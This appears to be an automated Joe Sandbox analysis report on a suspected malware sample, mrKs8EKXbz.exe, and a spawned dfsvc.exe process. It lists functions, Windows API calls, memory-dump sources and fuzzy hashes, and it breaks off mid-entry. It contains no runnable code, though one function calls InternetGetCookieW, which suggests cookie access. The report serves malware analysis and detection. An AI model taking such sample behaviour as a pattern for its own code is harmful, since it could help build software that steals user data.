Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 2597970681-0
Opcode ID: 48b501ab39fc9e6bb9671466257a4dc9779c18cf943af22467f9a7a0f6011b20
Instruction ID: a58428c2a1f8e0cdac9b2bf822299a60bf30cb287b2857a83d680a5645f5bdfc
Opcode Fuzzy Hash: 48b501ab39fc9e6bb9671466257a4dc9779c18cf943af22467f9a7a0f6011b20
Instruction Fuzzy Hash: F151DF7261422AABEB259F74EC81EBF77AAEB44750F25462DFC08D6140EB34DC40C690

Function 00028417 Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00028B8C,?,00000000,?,00000000,00000000), ref: 00028459
__fassign.LIBCMT ref: 000284D4
__fassign.LIBCMT ref: 000284EF
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00028515
WriteFile.KERNEL32(?,?,00000000,00028B8C,00000000,?,?,?,?,?,?,?,?,?,00028B8C,?), ref: 00028534
WriteFile.KERNEL32(?,?,00000001,00028B8C,00000000,?,?,?,?,?,?,?,?,?,00028B8C,?), ref: 0002856D

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 7fc047ec79e5766fe1857d53f6146985aaa2eaac43ae37de30df18d6884f26c9
Instruction ID: 538012c67eec3c5581e188b0dfed95a7c9ed18ebc2bb664b5b535a9331a373a3
Opcode Fuzzy Hash: 7fc047ec79e5766fe1857d53f6146985aaa2eaac43ae37de30df18d6884f26c9
Instruction Fuzzy Hash: 4D51B475E012699FDB11CFA8EC85AEEBBF8FF18304F14811AE955E7291DB309941CB60

Function 00021E00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 00021E37
___except_validate_context_record.LIBVCRUNTIME ref: 00021E3F
_ValidateLocalCookies.LIBCMT ref: 00021EC8
__IsNonwritableInCurrentImage.LIBCMT ref: 00021EF3
_ValidateLocalCookies.LIBCMT ref: 00021F48

Strings

csm, xrefs: 00021EDD

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: cd34d426802890e6e6efb078d8bc59ab36a41b7d8fe4f3cc777ac3c757de52b1
Instruction ID: 3d992bed98aac4b0056e62b3bd0206ca8e864956f3d95908e5f73071e01d5e54
Opcode Fuzzy Hash: cd34d426802890e6e6efb078d8bc59ab36a41b7d8fe4f3cc777ac3c757de52b1
Instruction Fuzzy Hash: 7041B034A00228ABCF10DF68EC85AEEBBF5BF55364F148055EC199B392D735AA11CB91

Function 0002621B Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000261DF: _free.LIBCMT ref: 00026208

_free.LIBCMT ref: 00026269

Part of subcall function 00024869: HeapFree.KERNEL32(00000000,00000000,?,0002620D,?,00000000,?,00000000,?,00026234,?,00000007,?,?,0002669F,?), ref: 0002487F
Part of subcall function 00024869: GetLastError.KERNEL32(?,?,0002620D,?,00000000,?,00000000,?,00026234,?,00000007,?,?,0002669F,?,?), ref: 00024891

_free.LIBCMT ref: 00026274
_free.LIBCMT ref: 0002627F
_free.LIBCMT ref: 000262D3
_free.LIBCMT ref: 000262DE
_free.LIBCMT ref: 000262E9
_free.LIBCMT ref: 000262F4

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
Instruction ID: 394448e2adf853b23565c5276fb10f9d56fdfe36e36b15bc1fea2d29bbe837cd
Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
Instruction Fuzzy Hash: 63113071540B74FFD660BBB1EC07FCB779CAF44700F444825B69AA6093EA76BA148790

Function 000223D1 Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,000223C8,0002209F,00021AFC), ref: 000223DF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000223ED
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00022406
SetLastError.KERNEL32(00000000,000223C8,0002209F,00021AFC), ref: 00022458

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 3723bdb0347254ae786e005cb11b01ddfccd6abe9106897c77385e78fcaf39de
Instruction ID: e2b77f83456192d1acb7dbbb8ed424e6d3ab8d5c7e2535e53cf00f8e97d0a923
Opcode Fuzzy Hash: 3723bdb0347254ae786e005cb11b01ddfccd6abe9106897c77385e78fcaf39de
Instruction Fuzzy Hash: A40184332092357EB6793BF87C89AEB2798DB157B47300339F520850E6EF554CA19250

Function 00024424 Relevance: 9.0, APIs: 6, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00000008,?,00026D69,?,?,?,000304C8,0000002C,00023F34,00000016,0002209F,00021AFC), ref: 00024428
_free.LIBCMT ref: 0002445B
_free.LIBCMT ref: 00024483
SetLastError.KERNEL32(00000000), ref: 00024490
SetLastError.KERNEL32(00000000), ref: 0002449C
_abort.LIBCMT ref: 000244A2

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: fd7f28b0e4442b950c45d13eac7f66c46b1d37775c9bfb5c8ff00034b562832a
Instruction ID: b4516d5468718232f66cb420815e20af9ee9a34b99067d86237e75234566a04b
Opcode Fuzzy Hash: fd7f28b0e4442b950c45d13eac7f66c46b1d37775c9bfb5c8ff00034b562832a
Instruction Fuzzy Hash: EEF0C8315006B0A7D66777357C49FAF37AE9BC1B71B354114F528D21D3EF6489025120

Function 000236FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,000236AD,?,?,0002364D,?,000302E0,0000000C,000237A4,?,00000002), ref: 0002371C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0002372F
FreeLibrary.KERNEL32(00000000,?,?,?,000236AD,?,?,0002364D,?,000302E0,0000000C,000237A4,?,00000002,00000000), ref: 00023752

Strings

CorExitProcess, xrefs: 00023727
mscoree.dll, xrefs: 00023715

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f7c394c37bc4a6423ffe33ce3e97f62300cd20fd4bd255cd7e7a019d29b00ac3
Instruction ID: 61a925c57476e0db89acc65bb795f5e0a5290a7cde951c90cff65ec77edb71e1
Opcode Fuzzy Hash: f7c394c37bc4a6423ffe33ce3e97f62300cd20fd4bd255cd7e7a019d29b00ac3
Instruction Fuzzy Hash: 2CF04F70A00228BBDB269B90EC49BEEBFF8EF08752F5440A5FD05A6150DB785A45CA90

Function 0002634D Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,000254C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 0002639A
__alloca_probe_16.LIBCMT ref: 000263D2
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00026423
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00026435
__freea.LIBCMT ref: 0002643E

Part of subcall function 000262FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00027E5B,?,00000000,?,0002686F,?,00000004,00000000,?,?,?,00023BCD), ref: 00026331

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 1857427562-0
Opcode ID: 78e39e055b697cf947291137ade0bbafe0ae6c7a649b1e567a1ebe9373e7c19b
Instruction ID: 1c0983c1cea3de8f22c69f670f3cca96ca17f32ce2b6d9e5a792ba5bc7060fae
Opcode Fuzzy Hash: 78e39e055b697cf947291137ade0bbafe0ae6c7a649b1e567a1ebe9373e7c19b
Instruction Fuzzy Hash: BB31C372A0022AABDF25DF64EC85DEE7BA5EF00310F144169FC14D6291E736CD55CBA0

Function 0002561E Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00025627
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0002564A

Part of subcall function 000262FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00027E5B,?,00000000,?,0002686F,?,00000004,00000000,?,?,?,00023BCD), ref: 00026331

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00025670
_free.LIBCMT ref: 00025683
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00025692

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
String ID:
API String ID: 2278895681-0
Opcode ID: 07404b57b822760c478289cb22f6cb689d2222ead6ade4f62bbe2ce955a37482
Instruction ID: 0cf7281bc65210c8ec56b3ff77fea2da48f46303566726b544d65b4a96d86421
Opcode Fuzzy Hash: 07404b57b822760c478289cb22f6cb689d2222ead6ade4f62bbe2ce955a37482
Instruction Fuzzy Hash: 81018472601A757F27311AA67C8DC7F7AADDFC2BA23660229F904C3141EF748D0681B4

Function 000244A8 Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,000247FE,00027E79,?,0002686F,?,00000004,00000000,?,?,?,00023BCD,?,00000000), ref: 000244AD
_free.LIBCMT ref: 000244E2
_free.LIBCMT ref: 00024509
SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00024516
SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 0002451F

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 50997cda39b4135a16091a1344251d700f229e4cde5bef8571a9aefa1812df17
Instruction ID: 4a741e7ff41206bea11cfcb0e489135aa5e6d94f036ea0dad1e1c5cb52d3f6c1
Opcode Fuzzy Hash: 50997cda39b4135a16091a1344251d700f229e4cde5bef8571a9aefa1812df17
Instruction Fuzzy Hash: AE01F436200A70ABA22776357C85FAF23AEABC57727310125F91DD2193EFB48D054020

Function 00026176 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 0002618E

Part of subcall function 00024869: HeapFree.KERNEL32(00000000,00000000,?,0002620D,?,00000000,?,00000000,?,00026234,?,00000007,?,?,0002669F,?), ref: 0002487F
Part of subcall function 00024869: GetLastError.KERNEL32(?,?,0002620D,?,00000000,?,00000000,?,00026234,?,00000007,?,?,0002669F,?,?), ref: 00024891

_free.LIBCMT ref: 000261A0
_free.LIBCMT ref: 000261B2
_free.LIBCMT ref: 000261C4
_free.LIBCMT ref: 000261D6

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 65310f6fdb96acfb6a85b3b76518ec76a6605b44f35ec937a6ada8aeaae0683e
Instruction ID: 51916edc56175410c435dd878057d9ff77f46fd1a51cf54f1439e258a62e9d5f
Opcode Fuzzy Hash: 65310f6fdb96acfb6a85b3b76518ec76a6605b44f35ec937a6ada8aeaae0683e
Instruction Fuzzy Hash: 96F09032624230AFD6A5EB99F983C9E77EDAB44B1036D0805F44ED7593CB35FC808A60

Function 00023D8F Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00023DAD

Part of subcall function 00024869: HeapFree.KERNEL32(00000000,00000000,?,0002620D,?,00000000,?,00000000,?,00026234,?,00000007,?,?,0002669F,?), ref: 0002487F
Part of subcall function 00024869: GetLastError.KERNEL32(?,?,0002620D,?,00000000,?,00000000,?,00026234,?,00000007,?,?,0002669F,?,?), ref: 00024891

_free.LIBCMT ref: 00023DBF
_free.LIBCMT ref: 00023DD2
_free.LIBCMT ref: 00023DE3
_free.LIBCMT ref: 00023DF4

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2c9c7fecc94bdebdd87d465a31ef62ac9257784ea33b141876f267635b386571
Instruction ID: fc61b1121f5d980f23f684357c23118f404d8d976474ac831ca21f5cbf05a288
Opcode Fuzzy Hash: 2c9c7fecc94bdebdd87d465a31ef62ac9257784ea33b141876f267635b386571
Instruction Fuzzy Hash: 6AF0D478825670DFEB9B6F16FD014C93B6DAB9A7203460216F5129A2B2CF3D09419BC1

Function 00022F53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\mrKs8EKXbz.exe,00000104), ref: 00022F93
_free.LIBCMT ref: 0002305E
_free.LIBCMT ref: 00023068

Strings

C:\Users\user\Desktop\mrKs8EKXbz.exe, xrefs: 00022F8A, 00022F91, 00022FC0, 00022FF8

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\mrKs8EKXbz.exe
API String ID: 2506810119-3305562951
Opcode ID: 499074c9b5474b42cd46c78e905e356d453d5e7a9bd9f9164cf845202ef339eb
Instruction ID: 4628ade47153cc24f25749cba6ca5df016a0965f7608e2101570147ff2af3be6
Opcode Fuzzy Hash: 499074c9b5474b42cd46c78e905e356d453d5e7a9bd9f9164cf845202ef339eb
Instruction Fuzzy Hash: EB316171A00264AFDB62DF99EC819DEBBFCEB8A710F104066F50497211DA759A44CB61

Function 000225E3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00022594,00000000,?,00031B50,?,?,?,00022737,00000004,InitializeCriticalSectionEx,0002BC48,InitializeCriticalSectionEx), ref: 000225F0
GetLastError.KERNEL32(?,00022594,00000000,?,00031B50,?,?,?,00022737,00000004,InitializeCriticalSectionEx,0002BC48,InitializeCriticalSectionEx,00000000,?,000224C7), ref: 000225FA
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00022622

Strings

api-ms-, xrefs: 00022607

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: d6eea5c9baf1a5a76bb84ed66e52054eaa7356ebc0d5a5528f5ebc8ecd71d94c
Instruction ID: 869ded4fcb7d4d2280a796ce0998c957b85f46896a2e707a097b7163a976d1c2
Opcode Fuzzy Hash: d6eea5c9baf1a5a76bb84ed66e52054eaa7356ebc0d5a5528f5ebc8ecd71d94c
Instruction Fuzzy Hash: 7CE04831640314FBFF221BA0FC4AF593F55AB10B51F204420FE0DE80E1E7A6F9559588

Function 000257DD Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00025784,00000000,00000000,00000000,00000000,?,00025981,00000006,FlsSetValue), ref: 0002580F
GetLastError.KERNEL32(?,00025784,00000000,00000000,00000000,00000000,?,00025981,00000006,FlsSetValue,0002C4D8,FlsSetValue,00000000,00000364,?,000244F6), ref: 0002581B
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00025784,00000000,00000000,00000000,00000000,?,00025981,00000006,FlsSetValue,0002C4D8,FlsSetValue,00000000), ref: 00025829

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 853a16455a313972e8de393aae9ebc3c86603b33e321eb37bb10bd8526c70092
Instruction ID: 9ec11fdbd8c7aeb58434e14b0605c2245ce7bf423564c7fe908e2b3a72a204eb
Opcode Fuzzy Hash: 853a16455a313972e8de393aae9ebc3c86603b33e321eb37bb10bd8526c70092
Instruction Fuzzy Hash: E601F732615732ABD7324A68BC84A5B77D8AF04BA27210534FE1AE7140DF74DC01C6E4

Function 000248BB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00024A27

Part of subcall function 0002474D: IsProcessorFeaturePresent.KERNEL32(00000017,0002473C,00000000,?,00000004,00000000,?,?,?,?,00024749,00000000,00000000,00000000,00000000,00000000), ref: 0002474F
Part of subcall function 0002474D: GetCurrentProcess.KERNEL32(C0000417), ref: 00024771
Part of subcall function 0002474D: TerminateProcess.KERNEL32(00000000), ref: 00024778

Strings

., xrefs: 00024BDE
*?, xrefs: 000248FE

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
Instruction ID: 3cd5a81acc6b337208eb7b78e80a93a0a429e2bb7840704108c6bea9b01cb94c
Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
Instruction Fuzzy Hash: 09519175E00229EFDF14DFA8D881AEEBBF5EF48314F24416AE854E7341E6719E418B50

Analysis Process: dfsvc.exePID: 5576, Parent PID: 3540COMMON

Execution Graph

Execution Coverage:	16.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	7
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD34661538 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,?,?,?,?,?,?,00000000,?,BA490003,?,00000000), ref: 00007FFD34661827

Strings

@ p4, xrefs: 00007FFD346615D9

Memory Dump Source

Source File: 00000002.00000002.3020882967.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34660000_dfsvc.jbxd

Similarity

API ID: LibraryLoad
String ID: @ p4
API String ID: 1029625771-2358660226
Opcode ID: ec33e65bcc48126a7c919a0f2837347328bc114acd74ccf43aba425f4a78ec89
Instruction ID: 0b762892a0b381af967725cc7a61c80f1c35ff88fc68131acb1da004172d8cf8
Opcode Fuzzy Hash: ec33e65bcc48126a7c919a0f2837347328bc114acd74ccf43aba425f4a78ec89
Instruction Fuzzy Hash: 25F13671B0DA894FEB55DF6888696F97BE1EF56320F0440BFD08DC7292DA2CA806C741

Function 00007FFD34671632 Relevance: 1.8, APIs: 1, Instructions: 282networkCOMMON

Download Yara Rule

APIs

InternetGetCookieW.WININET ref: 00007FFD34671816

Memory Dump Source

Source File: 00000002.00000002.3020882967.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34660000_dfsvc.jbxd

Similarity

API ID: CookieInternet
String ID:
API String ID: 930238652-0
Opcode ID: ff6eb970145b4cee448343c231f838511280e92ef987d5b9a56a60199d788dcc
Instruction ID: 48067deace004c692d47ffe8142a9ccf31aaefded814c35cfc0282d6350ccfaa
Opcode Fuzzy Hash: ff6eb970145b4cee448343c231f838511280e92ef987d5b9a56a60199d788dcc
